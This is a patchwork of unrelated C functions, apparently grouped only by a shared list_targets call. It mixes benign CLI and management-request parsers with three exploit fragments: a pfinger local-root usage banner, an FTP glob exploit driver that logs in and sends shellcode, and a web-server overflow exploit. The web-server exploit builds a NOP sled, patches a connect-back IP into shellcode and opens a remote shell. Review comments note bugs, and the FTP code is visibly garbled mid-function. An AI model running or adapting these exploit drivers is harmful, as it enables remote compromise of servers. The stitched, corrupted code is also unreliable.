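/*
 * list_func -- handle a "list" management request.
 *
 * The first child element of 'p' names the object class to enumerate
 * (target, initiator, tpgt or admin) and the matching list_* helper
 * builds the reply text.  A missing child, or a child without a name,
 * yields ERR_SYNTAX_MISSING_OBJECT; an unrecognised name yields
 * ERR_INVALID_OBJECT.  Whatever reply text results is queued on
 * 'reply' as a msg_mgmt_rply message.  'mgmt' is unused (ARGSUSED).
 */
/*ARGSUSED*/
void
list_func(xml_node_t *p, target_queue_t *reply, target_queue_t *mgmt)
{
	xml_node_t	*x = p->x_child;
	char		*reply_msg = NULL;

	if (x == NULL || x->x_name == NULL) {
		xml_rtn_msg(&reply_msg, ERR_SYNTAX_MISSING_OBJECT);
	} else if (strcmp(x->x_name, XML_ELEMENT_TARG) == 0) {
		reply_msg = list_targets(x);
	} else if (strcmp(x->x_name, XML_ELEMENT_INIT) == 0) {
		reply_msg = list_initiator(x);
	} else if (strcmp(x->x_name, XML_ELEMENT_TPGT) == 0) {
		reply_msg = list_tpgt(x);
	} else if (strcmp(x->x_name, XML_ELEMENT_ADMIN) == 0) {
		reply_msg = list_admin(x);
	} else {
		/*
		 * Only the error code goes back to the caller; the object
		 * name is not echoed.  (The previous version formatted it
		 * into a local buffer that was never read.)
		 */
		xml_rtn_msg(&reply_msg, ERR_INVALID_OBJECT);
	}

	queue_message_set(reply, 0, msg_mgmt_rply, reply_msg);
}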
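/*
 * Command-line front end for the job control tool.
 *
 * Options: -h prints usage (exit 0), -v enables verbose output, any other
 * option prints usage (exit 1); long options come from kLongOptions.
 * The first non-option word selects the command (default "list").  "list",
 * "list-targets" and "log" take no name; a lone word that is not one of
 * those is treated as "info <word>"; every other command takes the last
 * argument as the job name.
 *
 * Returns 0 on success and 1 when the command word is not recognised.
 */
int main(int argc, char** argv) {
	const char* command = "list";
	bool verbose = false;
	int c;

	while ((c = getopt_long(argc, argv, "+hv", kLongOptions, NULL)) != -1) {
		switch (c) {
			case 0:
				// getopt_long returns 0 for a long option that only
				// sets a flag through kLongOptions; nothing to do here.
				break;
			case 'h':
				usage(0);
				break;
			case 'v':
				verbose = true;
				break;
			default:
				usage(1);
				break;
		}
	}

	// The first non-option argument, if any, is the command word.
	if (argc - optind >= 1)
		command = argv[optind];

	if (strcmp(command, "list") == 0) {
		list_jobs(verbose);
	} else if (strcmp(command, "list-targets") == 0) {
		list_targets(verbose);
	} else if (strcmp(command, "log") == 0) {
		// get_log() receives the remaining words including "log" itself.
		get_log(argc - optind, &argv[optind]);
	} else if (argc == optind + 1) {
		// For convenience (the "info" command can be omitted)
		get_info(command);
	} else {
		// All commands that need a name following
		const char* name = argv[argc - 1];

		if (strcmp(command, "info") == 0) {
			get_info(name);
		} else if (strcmp(command, "start") == 0) {
			start_job(name);
		} else if (strcmp(command, "stop") == 0) {
			stop_job(name);
		} else if (strcmp(command, "restart") == 0) {
			restart_job(name);
		} else if (strcmp(command, "enable") == 0) {
			enable_job(name, true);
		} else if (strcmp(command, "disable") == 0) {
			enable_job(name, false);
		} else {
			fprintf(stderr, "%s: Unknown command \"%s\".\n", kProgramName,
				command);
			// An unknown command is an error: report it through the exit
			// status instead of exiting 0 as before.
			return 1;
		}
	}

	return 0;
}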
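/*
 * Print the banner and usage line, list the known targets and exit.
 *
 * argv is the program name (the caller's argv[0]) shown in the banner and
 * the usage line.  Never returns: ends in exit(0).
 */
void ussage (char *argv) {
	printf ("%s - pfinger local root, user, whatever exploit\n", argv);
	printf ("written by dvdman\n\n");
	/* The format contains a %s conversion, so the name must be passed;
	 * the previous call supplied no argument (undefined behavior). */
	printf ("Ussage %s <target type> \ntargets avalible:\n\n", argv);
	list_targets ();
	exit(0);
}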
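/*
 * Parse the command line into *args.
 *
 * argv[1] must name a target (target_map) and argv[2] a command
 * (command_map).  Consumed argv entries are overwritten with "" so the
 * final sweep can spot leftover, unrecognised parameters.  For the flash
 * and convert commands the first character of the filename argument is
 * restored from original_first_char (stashed elsewhere, presumably by the
 * option parser that cleared the entry).
 *
 * Returns 0 on success, 1 when a stand-alone help option (--version,
 * --targets, --targets-tex, --targets-html, --help/-h/--h) was handled,
 * -1 when args is NULL or fewer than three arguments were given, and
 * -3 .. -8 for the specific failures below.  Any negative status other
 * than -1 prints usage() (the target list for -3) before returning.
 */
int32_t parse_arguments( struct programmer_arguments *args,
                         const size_t argc,
                         char **argv )
{
    int32_t status = 0;

    if( NULL == args )
        return -1;

    /* initialize the argument block to empty, known values */
    args->target = tar_none;
    args->command = com_none;
    args->quiet = 0;
    args->suppressbootloader = 0;

    /* Special case - check for the help commands which do not require a device type */
    if( argc == 2 ) {
        if( 0 == strcasecmp(argv[1], "--version") ) {
            fprintf( stderr, PACKAGE_STRING "\n");
            return 1;
        }
        if( 0 == strcasecmp(argv[1], "--targets") ) {
            list_targets( LIST_STD );
            return 1;
        }
        if( 0 == strcasecmp(argv[1], "--targets-tex") ) {
            list_targets( LIST_TEX );
            return 1;
        }
        if( 0 == strcasecmp(argv[1], "--targets-html") ) {
            list_targets( LIST_HTML );
            return 1;
        }
        if( 0 == strcasecmp(argv[1], "--help")
                || 0 == strcasecmp(argv[1], "-h")
                || 0 == strcasecmp(argv[1], "--h") ) {
            usage();
            return 1;
        }
    }

    /* Make sure there are the minimum arguments */
    if( argc < 3 ) {
        basic_help();
        return -1;
    }

    if( 0 != assign_target(args, argv[1], target_map) ) {
        fprintf( stderr, "Unsupported target '%s'.\n", argv[1]);
        status = -3;
        goto done;
    }

    if( 0 != assign_option((int32_t *) &(args->command), argv[2], command_map) ) {
        status = -4;
        goto done;
    }

    /* These were taken care of above. */
    *argv[0] = '\0';
    *argv[1] = '\0';
    *argv[2] = '\0';

    /* assign command specific default values */
    switch( args->command ) {
        case com_flash :
            args->com_flash_data.force = 0;
            args->com_flash_data.segment = mem_flash;
            break;
        case com_launch :
            args->com_launch_config.noreset = 0;
            break;
        case com_dump :
            /* NOTE(review): com_dump also clears com_flash_data.force; this
             * only makes sense if the per-command structs overlap in a union
             * - confirm against the header. */
            args->com_read_data.segment = mem_flash;
            args->com_flash_data.force = 0;
            break;
        case com_bin2hex :
            args->com_convert_data.segment = mem_flash;
            break;
        default :
            break;
    }

    if( 0 != assign_global_options(args, argc, argv) ) {
        status = -5;
        goto done;
    }

    if( 0 != assign_command_options(args, argc, argv) ) {
        status = -6;
        goto done;
    }

    /* Make sure there weren't any *extra* options.  argc is a size_t, so
     * the index is one too (the old int32_t counter made this a
     * signed/unsigned comparison). */
    for( size_t i = 0; i < argc; i++ ) {
        if( '\0' != *argv[i] ) {
            fprintf( stderr, "unrecognized parameter\n" );
            status = -7;
            goto done;
        }
    }

    /* if this is a flash command, restore the filename */
    if( (com_flash == args->command) || (com_eflash == args->command) || (com_user == args->command) ) {
        if( NULL == args->com_flash_data.file ) {
            // TODO : it should be ok to not have a filename if --serial=hexdigits:offset is
            // provided, this should be implemented.. in fact, given that most of this
            // program is written to use a single command by it self, this probably should
            // be separated out as a new command. The caveat is if data is written to '\0'
            // in the hex file, serialize will do nothing bc can't unwrite w/o erase
            fprintf( stderr, "flash filename is missing\n" );
            status = -8;
            goto done;
        }
        args->com_flash_data.file[0] = args->com_flash_data.original_first_char;
    }

    if( (com_bin2hex == args->command) || (com_hex2bin == args->command) ) {
        if( NULL == args->com_convert_data.file ) {
            fprintf( stderr, "conversion filename is missing\n" );
            status = -8;
            goto done;
        }
        args->com_convert_data.file[0] = args->com_convert_data.original_first_char;
    }

done:
    if( 1 < debug ) {
        print_args( args );
    }

    if( -3 == status ) {
        list_targets( LIST_STD );
    } else if( 0 != status ) {
        usage();
    }

    return status;
}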
/*
 * Entry point: parses the command line, connects to the FTP server given
 * with -c/-o, logs in with -u and -p/-i, optionally sleeps, determines the
 * login's home directory (or takes it from -d) and hands everything to
 * ftp_glob_exploit().  Returns EXIT_FAILURE on any failed step and
 * EXIT_SUCCESS otherwise.  Strdup(), tcp_connect(), ftp_*(),
 * verify_shellcode(), archlist, bsdcode, FTP_PORT and the
 * debug_read/debug_write globals are defined outside this listing.
 *
 * NOTE(review): the text of the 'i' and 't' option cases is garbled in
 * this copy of the source (it looks like a redaction artefact); what is
 * left below is reproduced as found and does not compile as-is.
 */
int main(int argc, char **argv) {
    int sock, c;
    int port = FTP_PORT;
    int debuglevel = 0;
    char *host = NULL;
    char *username = NULL;
    char *password = NULL;
    struct arch *arch = NULL;
    char *shellcode = bsdcode;
    int target = 0;
    int sleep_time = 0;
    unsigned long code_addr = 0;
    char *homedir = NULL;;

    /* grab command line parameters */
    while((c = getopt(argc, argv, "c:o:u:p:it:d:l:v:s:h")) != EOF) {
        switch(c) {
            /* Strdup presumably is a checked strdup() wrapper - confirm. */
            case 'c': host = Strdup(optarg); break;
            /* NOTE(review): atoi() gives no error indication for a bad port. */
            case 'o': port = atoi(optarg); break;
            case 'u': username = Strdup(optarg); break;
            case 'p': password = Strdup(optarg);
                      /* hide the password from ps */
                      /* Only the argv copy is overwritten; the secret now
                       * lives in the heap string 'password'. */
                      memset(optarg, 'X', strlen(optarg)); break;
            /* Garbled in the source from here to the "list" comparison. */
            case 'i': password = getpass("Enter remote password: "******"list") == 0) { list_targets(); return EXIT_FAILURE; }
                      /* NOTE(review): 'target' indexes archlist without a
                       * range check, so an out-of-range value reads past
                       * the table. */
                      target = atoi(optarg);
                      arch = &(archlist[target]);
                      code_addr = ntohl(arch->code_addr);
                      shellcode = arch->shellcode;
                      break;
            case 'd': homedir = Strdup(optarg); break;
            case 'l': code_addr = ntohl(strtoul(optarg, NULL, 0)); break;
            case 'v': debuglevel = atoi(optarg); break;
            case 's': sleep_time = atoi(optarg); break;
            default: usage(argv[0]); break;
        }
    }

    /* check for required options */
    /* usage() presumably exits; if it returned, the NULL pointers below
     * would be dereferenced - confirm. */
    if(host == NULL || username == NULL || password == NULL || code_addr == 0)
        usage(argv[0]);

    /* setup the debug level */
    switch(debuglevel) {
        case 1: debug_read = 1; debug_write = 0; break;
        case 2: debug_read = 1; debug_write = 1; break;
        default: debug_read = 0; debug_write = 0; break;
    }

    /* make sure the shellcode is good */
    if(!verify_shellcode(shellcode))
        return EXIT_FAILURE;

    /* initiate the tcp connection to the ftp server */
    /* NOTE(review): on failure sock is -1 and is still passed to ftp_quit(). */
    if((sock = tcp_connect(host, port)) == -1) {
        fprintf(stderr, "[-] Connection to %s failed!\n", host);
        ftp_quit(sock);
        return EXIT_FAILURE;
    }

    if(arch == NULL)
        printf("[0] Connected to host %s.\n", host);
    else
        printf("[0] Connected to host %s\n\tusing type:\t%s.\n", host, arch->description);

    /* login */
    if(!ftp_login(sock, username, password)) {
        fprintf(stderr, "[-] Login failed, aborting!\n");
        ftp_quit(sock);
        return EXIT_FAILURE;
    }

    /* hey, so im anal! */
    /* NOTE(review): these strings are never read again, so an optimizer may
     * drop the plain memset() (dead-store elimination); explicit_bzero()
     * or an equivalent is the reliable way to scrub them.  They are also
     * never freed. */
    memset(password, 'X', strlen(password));
    memset(username, 'X', strlen(username));
    printf("[1] Login succeeded.\n");

    /* NOTE(review): this compares the address of the sleep() function, not
     * sleep_time, so the condition is always true (sleep(0) is harmless). */
    if(sleep != 0)
        sleep(sleep_time);

    if(homedir == NULL) {
        /* get home directory */
        if((homedir = ftp_gethomedir(sock)) == NULL) {
            fprintf(stderr, "[-] Couldn't retrieve home directory, aborting!\n");
            ftp_quit(sock);
            return EXIT_FAILURE;
        }
    }

    /* NOTE(review): %u with a size_t (strlen) is a format/argument mismatch;
     * %zu is the matching conversion. */
    printf("[2] Home directory retrieved as \"%s\", %u bytes.\n", homedir, strlen(homedir));

    /* do the exploitation */
    if(!ftp_glob_exploit(sock, homedir, code_addr, shellcode)) {
        fprintf(stderr, "[-] exploit failed, aborting!\n");
        ftp_quit(sock);
        return EXIT_FAILURE;
    }

    /* Only host is released; username, password and homedir (whose
     * ownership when it comes from ftp_gethomedir() is not visible here)
     * are left to process exit. */
    free(host);
    return EXIT_SUCCESS;
}
/*
 * Entry point of the tool.  Almost every working variable used here (ch,
 * i, target, addr, bsize, retfill, ver, shelltype, shellcode, shellport,
 * backport, path, cmd, a, b, c, d, back, dest, ptr, port, t, sock, s, l,
 * w, buff, addr_ptr, rlen, offset, verbose, exploit, srvok, m302ok,
 * starttime) is a file-scope global declared outside this listing, as are
 * tlist, slist, TIMEOUT, log(), debug(), connectm(), writem(), recvall(),
 * shell(), sigh, CLOSE and FREE.  log() presumably is a project macro or
 * function that shadows <math.h> log - confirm.  'env' is unused.
 *
 * Flow: option parsing -> a probe request whose response recvall() turns
 * into the srvok/m302ok/rlen globals -> parameter printout -> (only with
 * -e) a countdown, a second request built from buff, and shell().
 * Returns 0 after shell() returns; every other path leaves via exit(0).
 */
int main(int argc, char **argv, char **env) {
    if(argc<=1) usage(argv[0]);
    fputc('\n', stderr);

    while((ch=getopt(argc,argv,"t:s:p:a:l:i:r:xeb:vh"))!=EOF)
        switch (ch) {
            case 't': {
                /* -t 0 lists the table and exits; otherwise the 1-based
                 * index selects tlist[i-1].
                 * NOTE(review): i is used without an upper-bound check, so
                 * a value past the end of tlist reads out of bounds. */
                i = atoi(optarg);
                if(!i) list_targets(), exit(0); else i--;
                target = tlist[i].type;
                addr = tlist[i].ret_addr;
                bsize = tlist[i].bsize;
                retfill = tlist[i].retfill;
                /* ver decides below whether a Host: header is sent. */
                if(strstr(tlist[i].type, "1.3")) ver=3;
                if(strstr(tlist[i].type, "1.4")) ver=4;
            } break;
            case 's': {
                /* NOTE(review): slist[i] is likewise indexed unchecked. */
                i = atoi(optarg);
                shelltype = slist[i].shelltype;
                shellcode = slist[i].shellcode;
                shellport = slist[i].shellport;
                backport = slist[i].backport;
            } break;
            /* NOTE(review): strncpy() leaves path unterminated when optarg
             * is sizeof(path) bytes or longer. */
            case 'p': strncpy(path, optarg, sizeof(path)); break;
            case 'a': addr = strtoul(optarg, NULL, 0); break;
            case 'l': rlen = atoi(optarg); break;
            case 'i': bsize = atoi(optarg); break;
            case 'r': retfill = atoi(optarg); break;
            case 'v': verbose++; break;
            case 'x': test_shellcode(); break;
            case 'e': exploit++; break;
            case 'b': {
                /* Dotted-quad argument: dots become spaces so sscanf can
                 * read four ints.  Same strncpy termination caveat as -p;
                 * sscanf's return value is not checked, and (char) a..d
                 * silently truncates values above 255.  The writes below
                 * patch the global shellcode arrays in place. */
                strncpy(cmd, optarg, sizeof(cmd));
                for(i = 0; i < strlen(cmd); i++) if(cmd[i] == '.') cmd[i] = ' ';
                sscanf(cmd, "%d %d %d %d", &a, &b, &c, &d);
                if(!a||!b||!c||!d) log("0 in the ip. pls use another\n"), exit(0);
                if(!shellcode) log("use -s option before -b\n"), exit(0);
                if(shellcode==x86_bsd_connback) shellcode[24] = (char ) a, shellcode[25] = (char ) b, shellcode[26] = (char ) c, shellcode[27] = (char ) d, memcpy(&back, shellcode+24, 4);
                if(shellcode==x86_linux_connback) shellcode[12+33] = (char ) a, shellcode[12+34] = (char ) b, shellcode[12+35] = (char ) c, shellcode[12+36] = (char ) d, memcpy(&back, shellcode+12+33, 4);
            } break;
            case 'h':
            default: usage(argv[0]); break;
        }

    /* Last argument is host[:port]; the ':' is cut out of argv in place.
     * NOTE(review): atoi() does not report a malformed port. */
    dest=argv[argc - 1];
    ptr=strchr(dest,':');
    if(ptr!=NULL) { ptr[0]='\0'; ptr++; port=atoi(ptr);}

    log("start attack: (1.%d) %s\n\n", ver, target);
    log("connecting to %s %d ... ", dest, port);
    if(connectm(dest, port, &t)) exit(0);

    log("building query ...\n");
    /* 'target' is reused here as the optional Host: header line (heap
     * string, released with FREE at the end). */
    if(ver>3) { sprintf(cmd, "Host: %s\n", dest); target=strdup(cmd); } else target=strdup("");
    /* NOTE(review): sprintf() into the fixed-size global cmd is unbounded;
     * path and target both derive from user input, so snprintf() with
     * sizeof(cmd) is what a reviewer would expect here and below. */
    sprintf(cmd, "GET %s HTTP/1.0\n" "%s" "Accept: text/html, text/plain\n" "Accept: application/postscript, text/sgml, */*;q=0.01\n" "Accept-Encoding: gzip, compress\n" "Accept-Language: en\n" "Negotiate: trans\n" "User-Agent: Lynx/6.6.6\n" "\n", path, target);
    /* NOTE(review): %d with strlen() (size_t) mismatches; %zu matches. */
    log("sending query (%d) ... ", strlen(cmd));
    if(verbose) log("send>\n%s\n<send\n", cmd);
    /* perror() is called unconditionally, so it prints a stale errno
     * message even when writem() succeeded. */
    writem(); perror(NULL);

    log("receiving data ...\n");
    /* recvall() presumably sets srvok, m302ok and (when rlen is 0) rlen
     * from the response - confirm in its definition. */
    recvall(rlen);
    close(t);
    if(srvok) exit(0);
    if(!m302ok) log("url path not redirected. use -p to override\n"), exit(0);
    if(!rlen) log("rlen auto detection fail. use -l to override\n"), exit(0);
    if(rlen % 2) log("alignment error (rlen: %d). not exploitable.\n", rlen), exit(0);

    log("addr: 0x%x\n", (unsigned int) addr);
    log("rlen: %d\n", rlen);
    log("offset: %d\n", offset);
    addr += rlen + offset;
    log("use addr: 0x%x (addr + rlen + offset)\n", (unsigned int) addr);
    bsize-=rlen; bsize-=retfill; bsize/=2;
    log("buffer size: %d ((bsize-rlen-retfill)/2)\n", bsize);
    log("retfill: %d\n", retfill);
    log("shellcode len: %d\n\n", strlen(shellcode));
    if(!exploit) log("all seems ok. run again with -e option\n"), exit(0);

    if(backport) {
        /* Listening socket for the connect-back shell type.
         * NOTE(review): socket()/bind()/listen() results only go through
         * debug(); whether that aborts on error is not visible here. */
        if(!back) log("no connect back ip. use -b option\n"), exit(0);
        log("connect back to: 0x%08x %d\n", (unsigned long) back, backport);
        sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        s.sin_family = AF_INET;
        s.sin_port = htons(backport);
        s.sin_addr.s_addr = htonl(INADDR_ANY);
        debug("... bind", bind(sock, (struct sockaddr *)&s, sizeof(s)));
        debug("... listen", listen(sock, 5));
    }

    /* Countdown: longjmp() back to the setjmp() point until TIMEOUT
     * seconds have passed.  This is a busy loop that spins the CPU and
     * reprints the line continuously; a sleep()-based loop would do the
     * same without the setjmp/longjmp.  The %d here receives a time_t
     * difference, another format mismatch. */
    starttime = time(NULL);
    setjmp(w);
    log("ready in %d sec...\r", starttime + TIMEOUT - time(NULL));
    if(starttime + TIMEOUT >= time(NULL)) longjmp(w, 1);

    log("connecting to %s %d ... ", dest, port);
    if(connectm(dest, port, &t)) exit(0);

    log("building data ...\n");
    /* NOTE(review): malloc() result is not checked before memset(). */
    buff = (char *)malloc(bsize+retfill*4+100);
    memset(buff, 0x00, bsize+retfill*4+100);
    for(i=0; i<bsize; i++) buff[i] = 0x90;
    ptr=buff+((bsize)-(strlen(shellcode)));
    for(i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i];
    /* NOTE(review): storing through a long* derived from a char* offset
     * is an unaligned, aliasing-violating access; memcpy() is the
     * well-defined form. */
    addr_ptr = (long *)ptr;
    for(i=0; i<retfill; i+=4) *(addr_ptr++)=addr;

    log("building query + data ...\n");
    /* Same unbounded sprintf() into cmd as above, now with buff (bsize
     * bytes) as part of the request line. */
    sprintf(cmd, "GET %s%s HTTP/1.0\n" "%s" "Accept: text/html, text/plain\n" "Accept: application/postscript, text/sgml, */*;q=0.01\n" "Accept-Encoding: gzip, compress\n" "Accept-Language: en\n" "Negotiate: trans\n" "User-Agent: Lynx/6.6.6\n" "\n", path, buff, target);
    log("sending query + data (all: %d) (buff: %d) ... ", strlen(cmd), strlen(buff));
    if(verbose) log("send>\n%s\n<send\n", cmd);
    writem(); perror(NULL);

    log("shell ...\n");
    if(shellport) {
        log("connecting to %s %d ... ", dest, shellport);
        sleep(1);
        if(connectm(dest, shellport, &sock)) exit(0);
    }
    if(backport) {
        /* NOTE(review): sock is overwritten with the accepted descriptor,
         * so the listening socket is never closed; l must already hold
         * sizeof(s) (its initialisation is outside this listing). */
        debug("... accept", sock = accept(sock, (struct sockaddr *)&s, &l));
    }
    /* 2 is SIGINT; the SIGINT macro would make that explicit. */
    signal(2, sigh);
    shell();
    CLOSE(t);
    CLOSE(sock);
    FREE(target);
    log("done.\n");
    return 0;
}
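/*
 * Parse the command line into *args.
 *
 * argv[1] must name a target (target_map) and argv[2] a command
 * (command_map).  Consumed argv entries are overwritten with "" so the
 * final sweep can spot leftover, unrecognised parameters.  For the flash
 * commands the first character of the filename argument is restored from
 * original_first_char (stashed elsewhere, presumably by the option parser
 * that cleared the entry).
 *
 * Returns 0 on success, -1 when a stand-alone help option (--version,
 * --targets, --help) was handled, when args is NULL, or when fewer than
 * three arguments were given, and -3 .. -8 for the specific failures
 * below.  Any negative status other than -1 prints usage() (the target
 * list for -3) before returning.
 */
int32_t parse_arguments( struct programmer_arguments *args,
                         const size_t argc,
                         char **argv )
{
    int32_t status = 0;

    if( NULL == args )
        return -1;

    /* initialize the argument block to empty, known values */
    args->target = tar_none;
    args->command = com_none;
    args->quiet = 0;
    args->suppressbootloader = 0;

    /* Special case - check for the help commands which do not require a device type */
    if( argc == 2 ) {
        if( 0 == strcasecmp(argv[1], "--version") ) {
            fprintf( stderr, PACKAGE_STRING "\n");
            return -1;
        }
        if( 0 == strcasecmp(argv[1], "--targets") ) {
            list_targets();
            return -1;
        }
        if( 0 == strcasecmp(argv[1], "--help") ) {
            usage();
            return -1;
        }
    }

    /* Make sure there are the minimum arguments */
    if( argc < 3 ) {
        basic_help();
        return -1;
    }

    if( 0 != assign_target(args, argv[1], target_map) ) {
        fprintf( stderr, "Unsupported target '%s'.\n", argv[1]);
        status = -3;
        goto done;
    }

    if( 0 != assign_option((int32_t *) &(args->command), argv[2], command_map) ) {
        status = -4;
        goto done;
    }

    /* These were taken care of above. */
    *argv[0] = '\0';
    *argv[1] = '\0';
    *argv[2] = '\0';

    if( 0 != assign_global_options(args, argc, argv) ) {
        status = -5;
        goto done;
    }

    if( 0 != assign_command_options(args, argc, argv) ) {
        status = -6;
        goto done;
    }

    /* Make sure there weren't any *extra* options.  argc is a size_t, so
     * the index is one too (the old int32_t counter made this a
     * signed/unsigned comparison). */
    for( size_t i = 0; i < argc; i++ ) {
        if( '\0' != *argv[i] ) {
            fprintf( stderr, "unrecognized parameter\n" );
            status = -7;
            goto done;
        }
    }

    /* if this is a flash command, restore the filename */
    if( (com_flash == args->command) || (com_eflash == args->command) || (com_user == args->command) ) {
        if( NULL == args->com_flash_data.file ) {
            fprintf( stderr, "flash filename is missing\n" );
            status = -8;
            goto done;
        }
        args->com_flash_data.file[0] = args->com_flash_data.original_first_char;
    }

done:
    if( 1 < debug ) {
        print_args( args );
    }

    if( -3 == status ) {
        list_targets();
    } else if( 0 != status ) {
        usage();
    }

    return status;
}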